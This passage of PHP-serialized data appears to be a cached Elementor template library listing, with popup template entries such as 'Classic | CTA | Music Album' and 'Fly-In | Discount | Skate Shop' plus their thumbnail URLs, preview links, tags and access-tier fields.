Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:10;a:20:{s:4:\"tmpl\";i:1293;s:2:\"id\";i:22495;s:5:\"title\";s:27:\"Classic | CTA | Music Album\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/music-album-30.jpg\";s:12:\"tmpl_created\";i:1647430056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-music-album/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Ba\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:11;a:20:{s:4:\"tmpl\";i:1294;s:2:\"id\";i:22501;s:5:\"title\";s:37:\"Fly-In | CTA | Photography Exhibition\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/photography-exhibition-31.jpg\";s:12:\"tmpl_created\";i:1647430512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-photography-exhibition/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:12;a:20:{s:4:\"tmpl\";i:1295;s:2:\"id\";i:22507;s:5:\"title\";s:34:\"Classic | CTA | Clothing Shop Sale\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/clothing-shop-sale-32.jpg\";s:12:\"tmpl_created\";i:1647430774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-cta-clothing-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:13;a:20:{s:4:\"tmpl\";i:1296;s:2:\"id\";i:22486;s:5:\"title\";s:30:\"Classic | CTA | Shop Promotion\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/shop-promotion-28.jpg\";s:12:\"tmpl_created\";i:1647430951;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-shop-promotion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"cta\",\"Magazine\",\"Photography\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:14;a:20:{s:4:\"tmpl\";i:1297;s:2:\"id\";i:22516;s:5:\"title\";s:32:\"Fly-In | CTA | Glasses Shop Sale\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/glasses-shop-sale-33.jpg\";s:12:\"tmpl_created\";i:1647431136;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-cta-glasses-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:30:\"[\"Business\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:15;a:20:{s:4:\"tmpl\";i:1298;s:2:\"id\";i:22522;s:5:\"title\";s:30:\"Fly-In | Discount | Skate Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/50-skate-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647434058;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-skate-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:16;a:20:{s:4:\"tmpl\";i:1299;s:2:\"id\";i:22532;s:5:\"title\";s:43:\"Classic | Subscription | Basketball Academy\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/21-basketball-academy-Subscription.jpg\";s:12:\"tmpl_created\";i:1647434608;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/classic-subscription-basketball-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Education\",\"Marketing\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:17;a:20:{s:4:\"tmpl\";i:1300;s:2:\"id\";i:22543;s:5:\"title\";s:38:\"Classic | Discount | Veterinary Clinic\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/veterinery-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647435581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-discount-veterinary-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Discount\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:18;a:20:{s:4:\"tmpl\";i:1301;s:2:\"id\";i:22553;s:5:\"title\";s:39:\"Classic | Contact | Business Consulting\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/27-business-consulting-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647439935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/classic-contact-business-consulting/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:19;a:20:{s:4:\"tmpl\";i:1302;s:2:\"id\";i:22562;s:5:\"title\";s:28:\"Classic | Contact | Handyman\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/handyman-small.jpg\";s:12:\"tmpl_created\";i:1647440333;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-contact-handyman/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:20;a:20:{s:4:\"tmpl\";i:1303;s:2:\"id\";i:22573;s:5:\"title\";s:40:\"Classic | Discount | Online Fashion Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/31-online-fashion-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647462549;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-online-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:21;a:20:{s:4:\"tmpl\";i:1304;s:2:\"id\";i:22583;s:5:\"title\";s:36:\"Fly-In | Discount | Personal Trainer\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/personal-trainer-small.jpg\";s:12:\"tmpl_created\";i:1647503781;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-personal-trainer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:22;a:20:{s:4:\"tmpl\";i:1305;s:2:\"id\";i:22592;s:5:\"title\";s:41:\"Classic | Contact | Illustrator Portfolio\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/illustrator-protfolio-small.jpg\";s:12:\"tmpl_created\";i:1647504218;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-contact-illustrator-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:49:\"[\"Contact\",\"Creative Portfolio\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:23;a:20:{s:4:\"tmpl\";i:1306;s:2:\"id\";i:22602;s:5:\"title\";s:46:\"Bottom Bar | Discount | Handmade Ceramics Shop\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2022/03/handmade-ceramic-shop-36-small.jpg\";s:12:\"tmpl_created\";i:1647507007;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-ceramics-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:48:\"[\"Business\",\"cta\",\"Ecommerce\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:24;a:20:{s:4:\"tmpl\";i:1307;s:2:\"id\";i:22612;s:5:\"title\";s:51:\"Classic | Contact | Classic Car Restoration Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/restoration-car-shop-37-small.jpg\";s:12:\"tmpl_created\";i:1647507310;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/classic-contact-classic-car-restoration-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:25;a:20:{s:4:\"tmpl\";i:1308;s:2:\"id\";i:22621;s:5:\"title\";s:30:\"Classic | Booking | Life Coach\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/38-life-coach-Booking.jpg\";s:12:\"tmpl_created\";i:1647508596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-booking-life-coach/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Booking\",\"Business\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:26;a:20:{s:4:\"tmpl\";i:1309;s:2:\"id\";i:22632;s:5:\"title\";s:42:\"Classic |  Subscription | Merchandise Shop\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/Merchandise-Shop-39-small.jpg\";s:12:\"tmpl_created\";i:1647509196;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-subscription-merchandise-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Ecommerce\",\"Marketing\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:27;a:20:{s:4:\"tmpl\";i:1310;s:2:\"id\";i:22643;s:5:\"title\";s:48:\"Fly-In | Contact | Non-Governmental Organization\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/NGO-41-small.jpg\";s:12:\"tmpl_created\";i:1647509528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:150:\"https://library.elementor.com/popups/fly-in-contact-non-governmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:28;a:20:{s:4:\"tmpl\";i:1311;s:2:\"id\";i:22654;s:5:\"title\";s:35:\"Hello Bar | Contact | Family Doctor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/family-doctor-44-small.jpg\";s:12:\"tmpl_created\";i:1647509732;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/hello-bar-contact-family-doctor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Contact\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:29;a:20:{s:4:\"tmpl\";i:1312;s:2:\"id\";i:22663;s:5:\"title\";s:36:\"Classic | Subscription | Sports Blog\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/45-sport-blog-Subscription.jpg\";s:12:\"tmpl_created\";i:1647509908;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-sports-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:30;a:20:{s:4:\"tmpl\";i:1313;s:2:\"id\";i:22673;s:5:\"title\";s:30:\"Hello Bar | Booking | Event DJ\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/DJ-service-46-small.jpg\";s:12:\"tmpl_created\";i:1647510160;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/hello-bar-booking-event-dj/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Booking\",\"Events\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:31;a:20:{s:4:\"tmpl\";i:1314;s:2:\"id\";i:22684;s:5:\"title\";s:36:\"Fly-In | Discount | Cleaning Company\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/51-cleaning-company-Discount.jpg\";s:12:\"tmpl_created\";i:1647510546;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-cleaning-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Offer\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:32;a:20:{s:4:\"tmpl\";i:1315;s:2:\"id\";i:22693;s:5:\"title\";s:28:\"Fly-In | Contact | Carpenter\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/carpenter-53-small.jpg\";s:12:\"tmpl_created\";i:1647511972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-carpenter/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:33;a:20:{s:4:\"tmpl\";i:1316;s:2:\"id\";i:22703;s:5:\"title\";s:31:\"Classic | Booking | Yoga Studio\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/55-yoga-studio-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647512209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-booking-yoga-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Booking\",\"Contact\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:34;a:20:{s:4:\"tmpl\";i:1317;s:2:\"id\";i:22714;s:5:\"title\";s:37:\"Classic | Discount | Pet Care Company\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/56-Pet-Care-Discount.jpg\";s:12:\"tmpl_created\";i:1647513031;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-pet-care-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:35;a:20:{s:4:\"tmpl\";i:1318;s:2:\"id\";i:22725;s:5:\"title\";s:38:\"Fly-In | Discount | Online Coffee Shop\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/online-coffee-shop-57-small.jpg\";s:12:\"tmpl_created\";i:1647513325;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-discount-online-coffee-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Food\",\"Offer\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:36;a:20:{s:4:\"tmpl\";i:1319;s:2:\"id\";i:22737;s:5:\"title\";s:44:\"Fly-In | CTA | Moving &#038; Storage Company\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/moving-company-59-small.jpg\";s:12:\"tmpl_created\";i:1647520956;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-moving-storage-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:37;a:20:{s:4:\"tmpl\";i:1320;s:2:\"id\";i:22749;s:5:\"title\";s:47:\"Classic | Contact | Industrial Design Portfolio\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/60-industrial-design-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647528116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/classic-contact-industrial-design-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:40:\"[\"Contact\",\"Interior 